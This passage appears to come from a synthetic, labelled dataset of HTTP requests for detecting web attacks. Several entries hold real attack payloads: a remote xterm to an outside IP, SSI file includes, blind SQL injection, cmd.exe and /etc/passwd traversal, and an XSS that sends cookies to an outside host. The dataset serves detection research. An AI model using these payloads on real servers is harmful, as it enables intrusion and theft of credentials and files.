X-Forwarded-For: 225.212.15.105
X-Serial-Number: 4857297063808
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Pe=wontnelhp3esy&vs9neaap9=\r    xterm   -display  55.236.220.45:0.0&agtse=hR-1g_E&ep1man1trty=28&nt51=4435

End - Id: 43032
Start - Id: 40773
class: SSI
PUT /3w_6DBX8X/ofaefoiindhem/rurSSc.htm? HTTP/1.0
Content-Length: 188
Content-Language: Aef,rnin,r
Content-Encoding: gzip
Content-MD5: MnVlcmZua29WaXRyZWdhYg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 26 May 08 23:01:19 GMT
Host: 110.189.94.84:80
Connection: close
Accept: */*
Accept-Encoding: gzip;q=0.9, deflate;q=0.1, gzip
Accept-Language: *;q=0.9
Cache-Control: min-fresh=524
ETag: W/"FqylPNx7MR.nC4pcVF5"
If-Modified-Since: Thu, 01 Mar 07 08:47:18 CET
If-Match: *
If-None-Match: "VZjP0kVMXrFcuvmGWw"
Max-Forwards: 2029
Referer: /iha5gt/ebnen/tbtldt/jlsja6la/cWazft.fgf
User-Agent: ealtu (dLu3v@6; dUo7Sp0Ebt; eaG3nL; t9WYMir; erBy-sV)

3c=2356&lfI_=drop&reiNnm3=esdbvzo&oeI=504508&oCruncnIeetF=<!--   #odbc   connect="es84ina,nsEhsn,drs"         statement="select  *  from   v"-->&dt6roR1e1toc23=nuLw

End - Id: 40773
Start - Id: 48627
class: XPathInjection
POST /kKttaerhgb/9H@SznLvy/e0GlBGa/b8IhoI82ests/esarionngind6srjoUoe/b5O_YT-9j7SPZUxDol0V/ohHsLJ1nlC_KU8K6PXY.mspx? HTTP/1.1
Content-Length: 295
Content-Language: CfJrTc,Aaia
Content-Encoding: deflate
Content-Location: http://www.anbtk.be/tnhltt/eIsda/xEh1e.asp
Content-MD5: ZXE1MmV0Y2Rhb2FlM3NjWA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Feb 05 16:20:24 GMT
Last-Modified: Mon, 20 Oct 08 06:30:32 UTC
Host: www.tseyaw.net
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.6
Cache-Control: min-fresh=35208
Client-ip: 68.45.171.152
Cookie: d33=40141;AfOe=insertmochaz|bothdbhclii h ;Bou=4;iCmebc=12990;rmatltea=cHJ
Cookie2: $Version="9"
Date: Sun, 04 Jan 09 02:08:24 CET
ETag: W/"nUus8CIhQ-6I@fzm7nrc"
Expect: rcneifm=nmthhk;6exTej01=esgtdhS2
From: wsnewerh@atausf.it
If-Modified-Since: Tue, 05 Jan 10 22:58:45 UTC
If-Unmodified-Since: Thu, 05 Jun 08 20:13:58 UTC
If-Match: "-c95yXrVlBW9d_JI"
If-None-Match: "ETknoUyrhJSSRp0c"
If-Range: Tue, 17 Oct 06 12:48:14 UTC
Max-Forwards: 752
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM eW5FcXBhcmVnbWJ1cjJhdWFlRTBsbjg1b25ld2N0bmxPVWg=
Authorization: NTLM ZXNvY2hkYnNsTlR5bHd4eXRlYXNjc3d0c2JuaHFkNHNpMHV1c2dyZWhlbWFlcw==
Range: 939-64,563448-00397,65796-
Referer: /zraAe/Raib.jpg
TE: deflate;q=0.2
Trailer: Referer
User-Agent: toeoo1ahcbltmXHrYdp
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: fsllte/9.8 www.Tctow8.jpg, HTTP/4.6 www.otld.css
Transfer-Encoding: ossh3
Upgrade: eode/7.7
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 98968
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6LWhdDM5z9=tHd3qpNdtform&a8eqfrtjE=kkehls'    or count( path/child::node()[position(  )=(( i+j +  k  +l + 1)]  |     path/child::*()[position()=(k+1)])=1  or   'sditeAoo'  =   '  chnc9ur' or&raae=kkhua&svg9tcys=pwrO

End - Id: 48627
Start - Id: 37336
class: LdapInjection
GET /0JIadqdoci9esq/mN0t.gif? HTTP/1.0
Host: www.sioakwub.be
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: n3t)(&(objectClass =    an*)
Cache-Control: max-age=33907
Client-ip: 131.232.136.148
Cookie: amoic99itde2=IaeRe2Zm&;ishx=trfb$;N0T3itetkythfo=oahirll+;4p8se1meedi=&
Cookie2: $Version="052"
Date: Tue, 01 Jan 08 20:50:12 UTC
ETag: W/"NJ1.2WEgk_6awsr54"
Expect: 100-continue
From: ddtp@lesT.org
If-Modified-Since: Mon, 27 Sep 04 19:56:44 GMT
If-Unmodified-Since: Mon, 01 Mar 04 19:06:46 UTC
If-Match: *
If-None-Match: *
If-Range: "6xH2@5W0ssXsZjhHKQV"
Max-Forwards: 92
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: lsrrid nactta1e=moee
Authorization: leaN5 tobtnry7=2diiyo
Range: 06765-95986,-6,-81
Referer: /9rh6.aspx
TE: gzip,trailers,trailers
Trailer: Range
User-Agent: rBlouexienhet
UA-CPU: 68000
UA-Disp: 544,018,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 495x1616
Via: 0.6 178.121.21.218, HTTP/6.0 www.Dei5.html
Transfer-Encoding: identity
Upgrade: o3106M/9.9, E9rle4/4.1, oohnne/6.6, eelrde/4.9, Ix7ea/1.8
Warning: 644 www.kr8o.htm "Jnrqtdtsr4kgdnb5i" "Fri, 25 Aug 06 23:03:26 GMT"
X-Forwarded-For: 255.193.19.186
X-Serial-Number: 06549032
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37336
Start - Id: 27165
class: Valid
GET /t8n69_Pcj5v46Zx6LDR/hDgEj/svr/eaMhatobtnm8d4aajodt/ol4kUqxOSI.1b@us/0sefc1etatdhwtem/iiU@Ggpqicr_uw/v@tMqm3WEV0.I@pl/u@maHB69rV33Z-.png?WIeHsRLs=les&NeneZiddtono4d=%3D2odxwinntasock_stream%250drr%5Bda&9Ru_c=3799808&drederot=0220767&2Y6lirtet=%26n&vhsgebllei=4534729 HTTP/1.0
Host: 33.165.201.110
Connection: tteni
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 81.132.85.194
Cookie: Ko.qOuApassthruZ=41979;kfhlneedb3raa=tettmriVbodr;ZwKgoiV=dsiuwsAdno5ce9mt;ty=xpci2
Cookie2: $Version="2"
Date: Sat, 05 Sep 09 24:09:00 GMT
ETag: "f3dTSwKWN8d2GumF3R-"
Expect: Ougoui
From: rfaD@lnxcgefa16.uk
If-Modified-Since: Sun, 11 Apr 04 06:45:51 UTC
If-Unmodified-Since: Thu, 06 Sep 07 07:58:30 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 994
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM dWk0OW5tZXNzdEFMRW9oZXJvdXBhZmVhYXphdWtkc3luaTY2M0VvcEVyaA==
Authorization: euNa oeot2e=8ilb
Range: 026-10,-71,7-952
Referer: /w24e9l/doznc/c9ah/isiighe.wav
TE: trailers
Trailer: Accept
User-Agent: Mozilla/8.4 (X11; U; Open BSD i386 5.3; is-hn; rv:3.1.1) Gecko/89734837
UA-CPU: MIPS
UA-Disp: 137,543,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1267x0247
Via: 3.7 www.QentThs.css:78, Nsee/5.4 191.104.58.144, HTTP/4.9 190.23.192.178
Transfer-Encoding: compress
Upgrade: neae/3.6, fitz7t/2.1
Warning: 012 249.202.129.195 "qlunrYneiw7Ooerioi" 
X-Forwarded-For: 13.58.9.225
X-Serial-Number: 13809536911
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27165
Start - Id: 14280
class: Valid
GET /tisznsmceitrngad/dyZ-Il.ndAw0I7Kq.png?B4eacceptQnOOrxp_l=8QrReq-YJTh&slyhfInKptsts=hWbkbpVv0eF&rem=o3ietihslrp&bsrsroetfhaultl=heE HTTP/1.0
Host: 177.29.16.70
Connection: keep-alive
Accept: text/plain;q=0.8
Accept-Charset: windows-1257, gb2312;q=0.4
Accept-Encoding: *;q=0.7
Accept-Language: ol5hl98r-ncs0r1iE;q=0.6, inntatl-oLi1ihle
Cache-Control: max-age=11908
Client-ip: 12.204.42.238
Cookie: ri=eNlugMB5wYWN
Cookie2: $Version="842"
Date: Sun, 20 May 07 07:10:38 CET
ETag: W/"9LA.bvtOcbMnTrA"
Expect: 100-continue
From: 5Urtoesa@acesm4hrat.de
If-Modified-Since: Thu, 21 Sep 06 18:07:32 UTC
If-Unmodified-Since: Tue, 16 May 06 08:53:01 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 726
MIME-Version: 7.4
Pragma: e7e2uhi=soee1nwa
Proxy-Authorization: Basic aGU1ZWg6c2VhZjc=
Authorization: Basic aGVvc2Zzdkw6ZWdjZQ==
Range: 118-,169-11
Referer: http://oelaa.be/ioeos/s08gaP/bhbr.msf
TE: trailers,deflate,deflate
Trailer: Transfer-Encoding
User-Agent: g1tpsrOat (iSElmT; erOD@8h.HC; dwhwkaNo; oqjJ6lWgs)
UA-CPU: MIPS
UA-Disp: 280,047,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2883x951
Via: 3.6 121.212.176.85
Transfer-Encoding: deflate
Upgrade: tut/3.1, tnmcy/2.5, 9Pn5n/5.5, wtte/0.4, sWn/2.2
Warning: 261 160.174.141.172 "5cebyhn2vuze" "Sun, 25 Jun 06 09:52:04 UTC"
X-Forwarded-For: 235.126.58.179
X-Serial-Number: 0081275585581186032
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14280
Start - Id: 42669
class: SqlInjection
GET /mim/lZx6iY603Lev2/uw2ner5nsey/g7jtjiubgolemus.sh?mo1oee=ioaatXJTizrilx&antbo=a13Qd&rcp3AWKk=s5F-ueoqucsL&ehyr35jxts=3946394&aETQ=aLlm7ebohgtcw&tend=ntoosbko6s&jd8aen=%7E&eWritbhnurnqe=1832&ohoiesh7oNsda=az%28%5D%27oIfxp_n+2eyrie&igitt603am=981&ewc=q+&Nua=1aNo+ltfr%25ntna&ea4i=AND++++ascii%28lower%28substring%28%28SELECT+TOP+1++esVtsaeh+FROM++++sysobject+WHERE++xtype+++++%3D+++%27U%27+++%29%2C1%2C1%29%29%29++%3E+++111&cah1ndatqoUrtx=t25%28hd%3Cm8Rrn%3Fc%5Dss HTTP/1.0
Host: www.Cc8etrjno.st:80
Connection: close
Accept: text/html;q=0.3
Accept-Charset: iso-8859-1, iso-8859-6
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 179.202.66.201
Cookie: set1lo9iesqe2s=9005384813;yaEAegezlso=77957480;dtcmetaa=wonwmwma9non;in=ttTE;Vl1Fte=h<uf
Cookie2: $Version="1"
Date: Thu, 29 Nov 07 10:05:49 CET
ETag: W/"uROPmH-wt_Abq65K3"
Expect: 100-continue
If-Modified-Since: Fri, 11 Apr 08 04:19:16 GMT
If-Unmodified-Since: Fri, 23 Feb 07 15:18:07 UTC
If-Match: "jULdndvovV6X@mq"
If-None-Match: "mgM3YBhDL8pYO.wlO"
If-Range: "WqqhlTpo7fph2PGa1Eu"
Max-Forwards: 2
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic eWFlckVMOnI3NHRu
Authorization: sw7t waee=neao
Range: 73002-0
Referer: http://www.hieawtp.gov/tabslqaL.tiff
TE: chunked;q=0.8,deflate;q=0.0
Trailer: Accept
User-Agent: Mozilla/2.1 (Windows; U; Win98 6.4; su-il; rv:4.8.5) Gecko/65742192
UA-CPU: PowerPC
UA-Disp: 000,128,8
UA-OS: Windows 98
UA-Color: color32
Via: HTTP/7.4 www.Nc5uulo.js
Transfer-Encoding: compress
Upgrade: eeog/2.4, mitts/3.0, e6e3i/4.3, oaelt/5.7, heNtCn/4.2
Warning: 783 www.chvaonf.html "Tvnj8wlTdlch3nhl" "Mon, 08 Mar 04 04:17:40 CET"
X-Forwarded-For: 113.84.223.129
X-Serial-Number: 328822
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42669
Start - Id: 39645
class: SSI
GET /5taxUroj0__MbW/wr/i5tu/wyc/d4SS-jm_.d4oKYD_X/y9CDj7.G/ypreejsti2euAy/tuturhtuyao1lNutsef.css?rpe=yUgqJOVOpcS&4rJK9jNsJ=%3C%21--++%23include++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++++--%3E&sHImh=mu&xpJsd=%25u+esot+%3Fu&yil=77&eaz8t=5591238&y1tltae=thXrgeq7t&telsis=zgrcaesn0p&ei=tYolp&eeb=%3Fufromerk&lnsmdsaimwl=access_logssdeleteo66an HTTP/1.0
Host: www.lisiduu.de
Connection: 8lfs4
Accept: video/*
Accept-Charset: x-mac-arabic;q=0.2, euc-tw;q=0.4, iso-8859-9, iso-2022-jp;q=0.4, iso-2022-jp;q=0.0
Accept-Encoding: gzip
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 39.207.20.202
Cookie: lgshtvo0=dzsu;stnp6ld=88865580;etete=ndrcpbino0;TaIhe=90265082
Cookie2: $Version="277"
Date: Mon, 31 Jan 05 11:56:16 CET
ETag: W/"A2.v71CkZHD7@G96Mx"
Expect: 100-continue
From: w3fee@ThEishEn.net
If-Modified-Since: Sat, 16 Dec 06 24:30:49 GMT
If-Unmodified-Since: Fri, 20 May 05 08:22:40 UTC
If-Match: *
If-None-Match: "IW37ej9JezZMgRmh"
If-Range: *
Max-Forwards: 4
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic MklyaW46dHI1dDV6b3A=
Authorization: Digest response="7990c8aD25A18B6bFB7a1D1BBAdb1e1f"
Range: 54-,0-33,3-74
Referer: /iess/rihe/wmtmt.jpg
TE: trailers,trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/7.7 (Windows; U; Win 9x 9.8; ee-ec; rv:0.9.1) Gecko/39800535
UA-CPU: PowerPC
UA-Disp: 749,540,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 587x0700
Via: 9.8 www.nxdsog.jpeg:792, 8.1 179.52.196.3, 6.8 21.9.135.254:153
Transfer-Encoding: compress
Upgrade: o7s/5.6, dipl/2.7
Warning: 233 www.tttteg.htm "ttmdenotsrmsagg2nt4" "Mon, 21 May 07 21:20:21 CET"
X-Forwarded-For: 209.99.255.194
X-Serial-Number: 659531112
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39645
Start - Id: 3256
class: Valid
GET /tOV4lA./O4te/etAQNRiPalhR/z.5ucprocessing-instruction/eaoZtbn2/y@vIUvowV7z5aL1/xwetebmaoAl6e1e/5txbCh1OUb2.nsf?8servicesHg63Z6.k=676509&77ACJ=Ennioteel&c40dkqAmtM08=etdi8he7eueemded6&tpa2ahie=714&FXuZ6dDO=%26%3F&ilard=359&reramOYwwtic=516969&ei4gaseg=ntn HTTP/1.1
Host: www.tevwydl.cz
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: ifrjv8tF-t;q=0.7, b-rueea, Uurnin-oBeux, Sa6-uDgrans
Cache-Control: max-age=796
Client-ip: 112.59.59.14
Cookie: nn8llhtrTef=wgetsengeudhm;hehhwn8eeeriW2n=nuuC1evssjse;dhu=e3bedt2exec;T2ofsnc=lps> be6qcshutdowned5;azA=398413
Cookie2: $Version="34"
Date: Thu, 17 Dec 09 07:10:08 GMT
ETag: "X9kcHXqb@HPoA6Gp"
Expect: 100-continue
From: rnvsmwZ@Itn3.cz
If-Modified-Since: Sat, 30 May 09 24:06:25 GMT
If-Unmodified-Since: Wed, 18 May 05 07:50:39 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 86
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Basic dGVhWWFpZWE6ZW94MHQ=
Authorization: Basic b2VnMXg2OmF0ZW5zRnI5
Range: 583-
Referer: /rgjnui/nAar/Rbz9nnjf.cgi
TE: chunked;q=0.8,deflate;q=0.5,deflate
Trailer: Authorization
User-Agent: Mozilla/4.6 (compatible; MSIE 1.8; Win98; milL; ttr55us)
UA-CPU: StrongARM
UA-Disp: 355,465,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 796x812
Via: 5.7 www.ingyej.html
Transfer-Encoding: identity
Upgrade: yaer/0.4
Warning: 802 www.oaete.png "o4sslh" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 65430
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3256
Start - Id: 36579
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.0
Host: www.i1anbh8nV.com
Connection: close
Accept: text/*;q=0.1, video/*
Accept-Charset: macintosh
Accept-Encoding: 
Accept-Language: frp-mh;q=0.1, qg-p;q=0.5, neo2r8Si-a8st2N
Cache-Control: no-transform
Client-ip: 252.39.154.149
Cookie: Srqi4rLgu5ioR2t=reszt;Xo7Tn=4;y_j02OlW=8121813970;iei=doSlo;.22N=33355157
Cookie2: $Version="543"
Date: Wed, 07 Jun 06 16:11:21 UTC
ETag: W/"ii87XQjje42GUbBHrDr"
Expect: 100-continue
From: osNAoh@aHn2nry.de
If-Modified-Since: Fri, 06 Aug 04 02:57:58 CET
If-Unmodified-Since: Sun, 02 May 04 18:03:23 UTC
If-Match: "OyiTqp.o2UvPoyP3I"
If-None-Match: *
If-Range: Sun, 22 Jan 06 21:38:58 CET
Max-Forwards: 2394
MIME-Version: 3.8
Pragma: na='Fsswaes'
Proxy-Authorization: Digest nonce
Authorization: Basic cnMzcjpsMGVBQTc=
Range: 603-731460,2527-,65-
Referer: /iDzvaif4/hsheyh/f6asn/mr2qEyo.jsp
TE: trailers,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/3.1 (Windows; U; Win98 6.3; ji-ew; rv:1.2.3) Gecko/26305217
UA-CPU: PowerPC
UA-Disp: 380,5893,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: HTTP/0.0 www.aredjrc.tiff, 8.2 www.bxed.png, FTP/9.6 www.atenwi.png:5394
Transfer-Encoding: identity
Upgrade: oahg/6.4, 3ju/1.3, e2t/8.6
Warning: 599 www.hAIsisOi.shtml "ocofgRksxyiiso" "Mon, 21 Jun 04 14:43:21 GMT"
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 8032084316017934872
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36579
Start - Id: 47684
class: XSS
GET /mrCq./elxrF4pqogmbt5/em28n9dio/eKU5dyfBLZ4k2DwL/ZWxDUzMdW9tit/sugwIohdsir/sfZFyli/6GeRnodew0Pi3.php3?aw=srnfutiazman2aixo8&le2enttie=4099513&-iJMorcwget9yOa=sHtpm2uu&tamymlsazj5ng=suk&uow=vo7aenmelxCEpu&Ioznclhg=1etrartbpcliea&ot=tlGituoeTpntr&phonso=85155&Reound=dfpaECehTaa8nEqdt&nWQhdiv=5&o9Mws8gHr7fue=23186&ohihttihr=tqE2%40lXO&Ntumay1r=%3Cdiv+style+++%3D+++%22+++++width%3A++++expression%28%5Bwindow.open%28%27http%3A%2F%2F75.234.178.114%2Finroar.bin%27%2Bdocument.cookie%29%3B%5D%29%3B+++%22++++%3E HTTP/1.1
Host: 6.37.41.133:4161
Connection: l0iOrtrs
Accept: image/*;q=0.3, audio/*;q=0.7, audio/*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.0, identity
Accept-Language: 9sI6sec8-ialtt;q=0.9, rgq-ll9, eib8kLto-ejh;q=0.8, u2-iziew;q=0.6, n-yi
Cache-Control: min-fresh=53037
Client-ip: 90.94.4.212
Cookie: nsto=523810070;FJxvS1e=nseeo2lrJeea
Cookie2: $Version="702"
Date: Wed, 22 Feb 06 11:56:57 GMT
ETag: W/"1J-g4mVQQ066LcLj0iD8"
Expect: 100-continue
From: zlDtEnh@hmvarofRt.ch
If-Modified-Since: Tue, 13 Nov 07 02:19:42 GMT
If-Unmodified-Since: Tue, 07 Oct 08 11:38:48 UTC
If-Match: "GZpXPjgUThO8Eep"
If-None-Match: "pLvXZnxw1FRZ8P24f4Bj"
If-Range: *
Max-Forwards: 2
MIME-Version: 0.2
Pragma: osmEtiru=atSMfd
Proxy-Authorization: NTLM eXR0b2RubmMwbEhzaWVlZWUzZWhpZTJtcm5ucmluQWVzdzk2T3JlcmFUanU=
Authorization: NTLM ZW9MOWdkZW55cmdubmlyZW1oZTlpZUFlbzhnNjMxbDgwaGVlSUlvd3h0bmxU
Range: 70-,2-,3-3356
Referer: /g25ue/Disi/rheWt5po/rdltAhe7.txt
TE: trailers,chunked,chunked
Trailer: From
User-Agent: 1Fce9i1 http://www.ucuruies.net
UA-CPU: 68000
UA-Disp: 9242,0652,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 934x7117
Via: 0.4 0.114.127.182:98626
Transfer-Encoding: gzip
Upgrade: gnEas/1.7, t6e4/9.4, 6sseci/3.1, daIRa/3.5, livoLt/6.1
Warning: 797 10.182.112.205:62 "mparhiqesWqMnqIet2" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47684
Start - Id: 32777
class: Valid
POST /hx/tLJPpYtzIJ/8mbie5vek/excouaEegEto4t0bd/RWo/R1gvTechoH@fRpbYHI/dn7iooReeumAtm.css? HTTP/1.1
Content-Length: 12
Content-Language: waignhee
Content-Encoding: deflate
Content-Location: http://grdn.fr/ts0t/haszo/eLr2hqe0/aec3j5nt/misbi6fp.bin
Content-MD5: cmk4d2JzY2F0YUNEbWVPVA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Jul 08 22:23:20 GMT
Last-Modified: Tue, 15 Nov 05 11:15:55 UTC
Host: 136.41.118.158
Connection: L2dhpGs
Accept: audio/basic, image/*, text/xml
Accept-Charset: koi8;q=0.2, x-mac-korean;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 105.0.171.235
Cookie: sui=957876;pecirLi0srl=bosr
Cookie2: $Version="575"
Date: Wed, 20 Jun 07 21:42:29 GMT
ETag: "Yinajk@_Q-@G_cPmwPjA"
Expect: 100-continue
From: tat1a4z@I9Mfqr80t.gov
If-Modified-Since: Tue, 02 Feb 10 07:08:40 CET
If-Unmodified-Since: Thu, 15 May 08 16:30:06 CET
If-Match: *
If-None-Match: "z8E67wPj.JnkApq2"
If-Range: *
Max-Forwards: 87
MIME-Version: 7.8
Pragma: samoS='dn'
Proxy-Authorization: Basic TG83aUk6Y3h4ZWE4Y3A=
Authorization: Digest response="4eBbaEDCFd8Adb30DEcfb719e9C2BDB6"
Range: 7780-1621,55-
Referer: http://www.jaat.cz/u3Dt/pdfae/ibafJll/yg2i3j/kery6ni.aspx
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/1.3 (Windows; U; Win 9x 2.6; hA-rN; rv:6.8.3) Gecko/94210471
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4217x4135
Via: FTP/3.0 105.172.88.236, 4Es/7.6 215.4.15.19, 3.6 232.203.123.227
Transfer-Encoding: deflate
Upgrade: teeo23/2.3, xnsmm/4.8, ier/8.7, vw4/5.1, a5enee/7.1
Warning: 585 232.224.186.123 "moFEY6Tiefdaxpeea5e" 
X-Forwarded-For: 4.132.206.75
X-Serial-Number: 635173454093357601
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

saus=ibetpA5

End - Id: 32777
Start - Id: 465
class: Valid
GET /3FpZq.HJlZEPiyRfzXX/spMbk/yaxiiqzn7thL/eodXOeisds9kaahs9ec/tcYeC7t-a-O/plkuR0_i9ALXWfzJ.png?oot0Syf=eLqY7Lx7B&lnaN9eniier1i=ie&rE0cinaiO=318366&eukNcoit6etd=824260&aoo=var0ir&d1h6=l1d&llck=%3D&exylnhii=25241&cdestoblo=%40%7EGnshaeeFform&obsb3upl1a1l=srT7xct&lbnpst6eeweiin=p%3E+e%25nlnis&txAkWhaving4x3=745904302&oJ@betweenopen8lsO8.=2935568&ahthrSrisyGti=794 HTTP/1.1
Host: 246.227.45.8
Connection: close
Accept: */*
Accept-Charset: utf-7
Accept-Encoding: 
Accept-Language: wk-0o, ev-sarf9
Cache-Control: max-stale
Client-ip: 102.28.120.62
Cookie: e3qXtplJs2=tnixs1natr;dgr=mas;4eloe=twx
Cookie2: $Version="25"
Date: Fri, 08 Oct 04 09:02:19 CET
ETag: W/"99Mw4G9Fs96hsTS6Z"
Expect: skeo
From: oeicnnb@t32welnr5i.biz
If-Modified-Since: Mon, 09 Oct 06 14:12:34 CET
If-Unmodified-Since: Mon, 29 Dec 08 09:54:22 UTC
If-Match: *
If-None-Match: *
If-Range: "CK-k1n6@SvwNx1y"
Max-Forwards: 3
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM aG5pRmhlbmhyYXNsSTF5dGNhZXlvaXJybmVvZDkzcklpaWg5cG90YVNlbA==
Authorization: NTLM TmtpcG10ZXJwaWlubXNGYkY2c3NoaGlldGFuaXR3VGdodHVyZm12cEVlZDRlaQ==
Range: 0733-,91-
Referer: http://www.srtiPcdw.de/seYft9/eera2ej/iAia0tad/e2Fs.pdf
TE: chunked
Trailer: From
User-Agent: rNett (ocPgq189; ijED05G; zUxFXW6Kn; aTxWm-)
UA-CPU: x86
UA-Disp: 506,620,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7413x7082
Via: 3.2 225.88.138.231:781, 8.9 99.115.232.115
Transfer-Encoding: gzip
Upgrade: nctaty/4.9, eaee/7.6, lRntra/7.2, ras/7.9
Warning: 370 www.8nio.htm "rfssr" "Wed, 09 Dec 09 08:20:10 UTC"
X-Forwarded-For: 85.121.116.193
X-Serial-Number: 9170010950
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 465
Start - Id: 46332
class: PathTransversal
GET /buYQJqt9/aBC_dccL_tJH8@SS..jpeg?dswd=1484520456&xslzBdwzdelete2=%2Fetc%2Fpasswd&a2_2EMTX=n9yy%3Ea HTTP/1.0
Host: 12.232.87.43:9551
Connection: close
Accept: video/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: T-lnfi, wWtitme-ceenht;q=0.3, azr-gR
Cache-Control: no-store
Client-ip: 146.96.8.202
Cookie: Rs=6ejjatuzlocationoexe1$;acAthva=77433;Y5mform=rLthti9U
Cookie2: $Version="16"
Date: Wed, 11 Jan 06 15:20:56 UTC
ETag: "sMENIf_6Ej0sdIM"
Expect: 100-continue
From: 5alenh@genhnf8.org
If-Modified-Since: Sat, 30 Apr 05 17:27:34 GMT
If-Unmodified-Since: Tue, 24 Feb 09 14:54:38 GMT
If-Match: *
If-None-Match: *
If-Range: "vik.dT13hr@dUPyPUUF"
Max-Forwards: 075
MIME-Version: 3.4
Pragma: Ue=uyd3P
Proxy-Authorization: Digest nc=54AeEe7f
Authorization: NTLM aW9ybHJlMnI3aG9lZWh0c2NpOWFtZXJzYW5yS25waXJw
Range: 11-897,103770-88,-588131
Referer: /byJf/47oq11j/Osee/ohGiln.exe
TE: deflate;q=0.2,trailers,trailers
Trailer: Max-Forwards
User-Agent: twidEcesn
UA-CPU: PowerPC
UA-Disp: 0890,6289,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 598x8169
Via: 9.7 www.pkttom7.jpg, 3.0 www.lenDaNre.html, 3.5 www.dgtg.js
Transfer-Encoding: identity
Upgrade: Dnh/3.3, iienNa/1.0, khpjt/2.7, ote6v4/0.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 84.224.165.18
X-Serial-Number: 5744439401
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46332
Start - Id: 2994
class: Valid
GET /aPtT_4a6T0usjjyd73-N/68Q.w-4Ltbue/etwilaHruadent/dzf46a_g.php?wtaltvyh8e=tidghrrtz7eri&dotaHtohcoe4r=1Lj&mmoiohjkthe=rQoxXfh7.m&St6qh0to0Pt=xdr+documentm1&PpositionRmm4i7=%5Dnhtryypf&thDpfs3nljri=53 HTTP/1.0
Host: www.asnokrfr.de
Connection: close
Accept: application/zip;q=0.8, text/plain;q=0.9, application/zip
Accept-Charset: x-mac-turkish;q=0.7, x-mac-roman;q=0.1, iso-8859-6;q=0.8
Accept-Encoding: identity;q=0.0
Accept-Language: *;q=0.1
Cache-Control: 6usoTec=48eeha
Client-ip: 235.26.250.245
Cookie: ecO=88242;Ur3whyrsnn1i=Wv66c8lowronati
